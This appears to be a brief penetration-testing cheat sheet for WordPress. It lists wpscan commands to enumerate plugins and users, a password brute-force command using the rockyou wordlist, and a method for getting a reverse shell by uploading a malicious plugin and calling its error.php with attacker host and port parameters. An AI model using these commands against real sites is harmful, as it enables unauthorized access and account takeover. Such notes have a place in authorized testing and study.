wpscan
enumerate plugins
wpscan --update --url http://192.168.120.66/ --enumerate ap --plugins-detection aggressive
enumerate users
wpscan --url http://$_target -e u --disable-tls-checks
brute force user accounts
wpscan --url http://$_target -e u --disable-tls-checks -U users.lst -P /usr/share/wordlists/rockyou.txt
Conwell-Quotes for reverse shell
If you have access to upload a plugin, you can get reverse shell with Conwell-Quotes https://github.com/kylepott/Conwell-Quotes
error.php?ip=$LHOST&port=$LPORT
Last updated